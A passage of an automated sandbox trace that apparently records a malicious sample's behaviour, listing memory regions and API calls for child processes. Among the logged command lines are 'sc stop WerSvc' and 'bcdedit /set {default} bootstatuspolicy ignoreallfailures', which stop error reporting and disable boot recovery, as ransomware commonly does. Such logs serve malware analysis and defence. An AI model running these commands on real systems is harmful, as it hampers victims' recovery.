"\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1022 start_va = 0x772a0000 end_va = 0x773befff entry_point = 0x0 region_type = private name = "private_0x00000000772a0000" filename = "" Region: id = 1023 start_va = 0x773c0000 end_va = 0x774b9fff entry_point = 0x0 region_type = private name = "private_0x00000000773c0000" filename = "" Region: id = 1024 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1025 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1026 start_va = 0x30000 end_va = 0x36fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1027 start_va = 0x70000 end_va = 0x71fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 1028 start_va = 0x300000 end_va = 0x3bffff entry_point = 0x300000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 1029 start_va = 0x80000 end_va = 0x8ffff entry_point = 0x80000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\sc.exe.mui") Thread: id = 40 os_tid = 0xb38 [0021.648] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2ffb44 | out: lpSystemTimeAsFileTime=0x2ffb44*(dwLowDateTime=0x14811200, dwHighDateTime=0x1d35d7b)) [0021.648] GetCurrentProcessId () returned 0xb34 [0021.648] GetCurrentThreadId () returned 0xb38 [0021.648] GetTickCount () returned 0x14884 [0021.648] QueryPerformanceCounter (in: lpPerformanceCount=0x2ffb3c | out: lpPerformanceCount=0x2ffb3c*=325615439) returned 1 [0021.648] GetModuleHandleA (lpModuleName=0x0) returned 0x180000 [0021.648] __set_app_type (_Type=0x1) [0021.648] __p__fmode () returned 0x76d831f4 [0021.648] __p__commode () returned 0x76d831fc [0021.649] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x1879c7) returned 0x0 [0021.649] __wgetmainargs (in: _Argc=0x189020, _Argv=0x189028, _Env=0x189024, _DoWildCard=0, _StartInfo=0x189034 | out: _Argc=0x189020, _Argv=0x189028, _Env=0x189024) returned 0 [0021.649] SetThreadUILanguage (LangId=0x0) returned 0x409 [0021.657] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0021.658] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0021.658] wcsncmp (_String1="st", _String2="\\\\", _MaxCount=0x2) returned 23 [0021.658] _wcsicmp (_String1="stop", _String2="query") returned 2 [0021.658] _wcsicmp (_String1="stop", _String2="queryex") returned 2 [0021.658] _wcsicmp (_String1="stop", _String2="start") returned 14 [0021.658] _wcsicmp (_String1="stop", _String2="pause") returned 3 [0021.658] _wcsicmp (_String1="stop", _String2="interrogate") returned 10 [0021.658] _wcsicmp (_String1="stop", _String2="control") returned 16 [0021.658] _wcsicmp (_String1="stop", _String2="continue") returned 16 [0021.658] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0021.658] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x72f740 [0021.660] OpenServiceW (hSCManager=0x72f740, lpServiceName="ERSvc", dwDesiredAccess=0x20) returned 0x0 [0021.660] GetLastError () returned 0x424 [0021.660] _itow (in: _Dest=0x424, _Radix=3144156 | out: _Dest=0x424) returned="1060" [0021.660] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x424, dwLanguageId=0x0, lpBuffer=0x189380, nSize=0x400, Arguments=0x0 | out: lpBuffer="The specified service does not exist as an installed service.\r\n") returned 0x3f [0021.662] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0x2ff9c4, nSize=0x2, Arguments=0x2ff9d0 | out: lpBuffer="ᦈs\x01") returned 0x62 [0021.663] GetFileType (hFile=0x7) returned 0x2 [0021.673] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ff998 | out: lpMode=0x2ff998) returned 1 [0021.674] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x731988*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0x2ff9b4, lpReserved=0x0 | out: lpBuffer=0x731988*, lpNumberOfCharsWritten=0x2ff9b4*=0x62) returned 1 [0021.676] LocalFree (hMem=0x731988) returned 0x0 [0021.676] LocalFree (hMem=0x0) returned 0x0 [0021.676] CloseServiceHandle (hSCObject=0x72f740) returned 1 [0021.783] exit (_Code=1060) Thread: id = 45 os_tid = 0xb58 Process: id = "17" image_name = "sc.exe" filename = "c:\\windows\\syswow64\\sc.exe" page_root = "0x637c1000" os_pid = "0xb50" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "8" os_parent_pid = "0xaa8" cmd_line = "sc stop WerSvc" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:000101a7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 992 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 993 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 994 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 995 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 996 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 997 start_va = 0x90000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 998 start_va = 0x180000 end_va = 0x18bfff entry_point = 0x187997 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\SysWOW64\\sc.exe" (normalized: "c:\\windows\\syswow64\\sc.exe") Region: id = 999 start_va = 0x1b0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 1000 start_va = 0x774c0000 end_va = 0x77668fff entry_point = 0x774c0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1001 start_va = 0x776a0000 end_va = 0x7781ffff entry_point = 0x776a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1002 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 1003 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 1004 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 1005 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 1006 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1007 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1008 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1064 start_va = 0x260000 end_va = 0x2dffff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 1065 start_va = 0x74bd0000 end_va = 0x74bd7fff entry_point = 0x74bd20f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1066 start_va = 0x74be0000 end_va = 0x74c3bfff entry_point = 0x74c1f798 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1067 start_va = 0x74c40000 end_va = 0x74c7efff entry_point = 0x74c6de78 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1068 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1069 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1070 start_va = 0xd0000 end_va = 0x136fff entry_point = 0xd0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1071 start_va = 0x350000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 1072 start_va = 0x5f0000 end_va = 0x5fffff entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 1073 start_va = 0x751f0000 end_va = 0x751fbfff entry_point = 0x751f10e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1074 start_va = 0x75200000 end_va = 0x7525ffff entry_point = 0x7521a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1075 start_va = 0x75660000 end_va = 0x7574ffff entry_point = 0x75670569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1076 start_va = 0x76a20000 end_va = 0x76b2ffff entry_point = 0x76a332d3 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1077 start_va = 0x76c90000 end_va = 0x76cd5fff entry_point = 0x76c97478 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1078 start_va = 0x76ce0000 end_va = 0x76d8bfff entry_point = 0x76cea472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1079 start_va = 0x76fa0000 end_va = 0x76fb8fff entry_point = 0x76fa4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1080 start_va = 0x77200000 end_va = 0x7729ffff entry_point = 0x772149e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1081 start_va = 0x772a0000 end_va = 0x773befff entry_point = 0x0 region_type = private name = "private_0x00000000772a0000" filename = "" Region: id = 1082 start_va = 0x773c0000 end_va = 0x774b9fff entry_point = 0x0 region_type = private name = "private_0x00000000773c0000" filename = "" Region: id = 1083 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1084 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1110 start_va = 0x30000 end_va = 0x36fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1111 start_va = 0x70000 end_va = 0x71fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 1112 start_va = 0x450000 end_va = 0x50ffff entry_point = 0x450000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 1113 start_va = 0x80000 end_va = 0x8ffff entry_point = 0x80000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\sc.exe.mui") Thread: id = 44 os_tid = 0xb54 [0021.848] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xcfc04 | out: lpSystemTimeAsFileTime=0xcfc04*(dwLowDateTime=0x14a003e0, dwHighDateTime=0x1d35d7b)) [0021.848] GetCurrentProcessId () returned 0xb50 [0021.848] GetCurrentThreadId () returned 0xb54 [0021.848] GetTickCount () returned 0x1494e [0021.848] QueryPerformanceCounter (in: lpPerformanceCount=0xcfbfc | out: lpPerformanceCount=0xcfbfc*=326319164) returned 1 [0021.848] GetModuleHandleA (lpModuleName=0x0) returned 0x180000 [0021.848] __set_app_type (_Type=0x1) [0021.848] __p__fmode () returned 0x76d831f4 [0021.848] __p__commode () returned 0x76d831fc [0021.849] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x1879c7) returned 0x0 [0021.849] __wgetmainargs (in: _Argc=0x189020, _Argv=0x189028, _Env=0x189024, _DoWildCard=0, _StartInfo=0x189034 | out: _Argc=0x189020, _Argv=0x189028, _Env=0x189024) returned 0 [0021.849] SetThreadUILanguage (LangId=0x0) returned 0x409 [0021.852] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0021.852] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0021.852] wcsncmp (_String1="st", _String2="\\\\", _MaxCount=0x2) returned 23 [0021.852] _wcsicmp (_String1="stop", _String2="query") returned 2 [0021.852] _wcsicmp (_String1="stop", _String2="queryex") returned 2 [0021.852] _wcsicmp (_String1="stop", _String2="start") returned 14 [0021.852] _wcsicmp (_String1="stop", _String2="pause") returned 3 [0021.852] _wcsicmp (_String1="stop", _String2="interrogate") returned 10 [0021.852] _wcsicmp (_String1="stop", _String2="control") returned 16 [0021.852] _wcsicmp (_String1="stop", _String2="continue") returned 16 [0021.852] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0021.852] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x35f740 [0021.854] OpenServiceW (hSCManager=0x35f740, lpServiceName="WerSvc", dwDesiredAccess=0x20) returned 0x35f6a0 [0021.855] ControlService (in: hService=0x35f6a0, dwControl=0x1, lpServiceStatus=0xcfb00 | out: lpServiceStatus=0xcfb00*(dwServiceType=0x20, dwCurrentState=0x1, dwControlsAccepted=0x0, dwWin32ExitCode=0x435, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x0, dwWaitHint=0x0)) returned 0 [0021.855] GetLastError () returned 0x426 [0021.855] _itow (in: _Dest=0x426, _Radix=850588 | out: _Dest=0x426) returned="1062" [0021.855] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x426, dwLanguageId=0x0, lpBuffer=0x189380, nSize=0x400, Arguments=0x0 | out: lpBuffer="The service has not been started.\r\n") returned 0x23 [0021.857] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0xcfa84, nSize=0x2, Arguments=0xcfa90 | out: lpBuffer="㴈6\x01") returned 0x49 [0021.860] GetFileType (hFile=0x7) returned 0x2 [0021.860] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0xcfa58 | out: lpMode=0xcfa58) returned 1 [0021.860] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x363d08*, nNumberOfCharsToWrite=0x49, lpNumberOfCharsWritten=0xcfa74, lpReserved=0x0 | out: lpBuffer=0x363d08*, lpNumberOfCharsWritten=0xcfa74*=0x49) returned 1 [0021.861] LocalFree (hMem=0x363d08) returned 0x0 [0021.861] LocalFree (hMem=0x0) returned 0x0 [0021.861] CloseServiceHandle (hSCObject=0x35f6a0) returned 1 [0021.861] CloseServiceHandle (hSCObject=0x35f740) returned 1 [0021.908] exit (_Code=1062) Thread: id = 49 os_tid = 0xb74 Process: id = "18" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x637b6000" os_pid = "0xb68" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x9c4" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:000101a7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1085 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1086 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1087 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1088 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 1089 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 1090 start_va = 0x210000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 1091 start_va = 0x320000 end_va = 0x41ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 1092 start_va = 0x4a510000 end_va = 0x4a55bfff entry_point = 0x4a51829a region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 1093 start_va = 0x774c0000 end_va = 0x77668fff entry_point = 0x774c0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1094 start_va = 0x776a0000 end_va = 0x7781ffff entry_point = 0x776a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1095 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 1096 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 1097 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 1098 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 1099 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1100 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1101 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1102 start_va = 0x5c0000 end_va = 0x63ffff entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 1103 start_va = 0x74bd0000 end_va = 0x74bd7fff entry_point = 0x74bd20f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1104 start_va = 0x74be0000 end_va = 0x74c3bfff entry_point = 0x74c1f798 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1105 start_va = 0x74c40000 end_va = 0x74c7efff entry_point = 0x74c6de78 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1174 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1175 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1176 start_va = 0x70000 end_va = 0xd6fff entry_point = 0x70000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1177 start_va = 0x190000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 1178 start_va = 0x7e0000 end_va = 0x8dffff entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 1179 start_va = 0x73fa0000 end_va = 0x73fa6fff entry_point = 0x73fa1230 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\SysWOW64\\winbrand.dll" (normalized: "c:\\windows\\syswow64\\winbrand.dll") Region: id = 1180 start_va = 0x751f0000 end_va = 0x751fbfff entry_point = 0x751f10e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1181 start_va = 0x75200000 end_va = 0x7525ffff entry_point = 0x7521a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1182 start_va = 0x75660000 end_va = 0x7574ffff entry_point = 0x75670569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1183 start_va = 0x76430000 end_va = 0x7652ffff entry_point = 0x7644b6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1184 start_va = 0x76a20000 end_va = 0x76b2ffff entry_point = 0x76a332d3 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1185 start_va = 0x76c90000 end_va = 0x76cd5fff entry_point = 0x76c97478 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1186 start_va = 0x76ce0000 end_va = 0x76d8bfff entry_point = 0x76cea472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1187 start_va = 0x76e20000 end_va = 0x76eaffff entry_point = 0x76e36343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1188 start_va = 0x76f00000 end_va = 0x76f9cfff entry_point = 0x76f33fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 1189 start_va = 0x76fa0000 end_va = 0x76fb8fff entry_point = 0x76fa4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1190 start_va = 0x77200000 end_va = 0x7729ffff entry_point = 0x772149e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1191 start_va = 0x772a0000 end_va = 0x773befff entry_point = 0x0 region_type = private name = "private_0x00000000772a0000" filename = "" Region: id = 1192 start_va = 0x773c0000 end_va = 0x774b9fff entry_point = 0x0 region_type = private name = "private_0x00000000773c0000" filename = "" Region: id = 1193 start_va = 0x77670000 end_va = 0x77679fff entry_point = 0x776736a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 1194 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1195 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1196 start_va = 0x420000 end_va = 0x5a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 1197 start_va = 0x767d0000 end_va = 0x7689bfff entry_point = 0x767d168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1198 start_va = 0x768a0000 end_va = 0x768fffff entry_point = 0x768b158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1199 start_va = 0x30000 end_va = 0x36fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1200 start_va = 0xe0000 end_va = 0xe1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 1201 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 1202 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 1203 start_va = 0x640000 end_va = 0x7c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000640000" filename = "" Region: id = 1204 start_va = 0x8e0000 end_va = 0x1cdffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008e0000" filename = "" Region: id = 1205 start_va = 0x1ce0000 end_va = 0x2022fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ce0000" filename = "" Thread: id = 47 os_tid = 0xb6c [0022.158] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x41fa44 | out: lpSystemTimeAsFileTime=0x41fa44*(dwLowDateTime=0x14cf9f60, dwHighDateTime=0x1d35d7b)) [0022.158] GetCurrentProcessId () returned 0xb68 [0022.158] GetCurrentThreadId () returned 0xb6c [0022.158] GetTickCount () returned 0x14a86 [0022.158] QueryPerformanceCounter (in: lpPerformanceCount=0x41fa3c | out: lpPerformanceCount=0x41fa3c*=327408766) returned 1 [0022.160] GetModuleHandleA (lpModuleName=0x0) returned 0x4a510000 [0022.160] __set_app_type (_Type=0x1) [0022.160] __p__fmode () returned 0x76d831f4 [0022.160] __p__commode () returned 0x76d831fc [0022.160] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a5321a6) returned 0x0 [0022.160] __getmainargs (in: _Argc=0x4a534238, _Argv=0x4a534240, _Env=0x4a53423c, _DoWildCard=0, _StartInfo=0x4a534140 | out: _Argc=0x4a534238, _Argv=0x4a534240, _Env=0x4a53423c) returned 0 [0022.161] GetCurrentThreadId () returned 0xb6c [0022.161] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb6c) returned 0x60 [0022.161] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76a20000 [0022.161] GetProcAddress (hModule=0x76a20000, lpProcName="SetThreadUILanguage") returned 0x76a4a84f [0022.161] SetThreadUILanguage (LangId=0x0) returned 0x409 [0022.178] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0022.178] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, 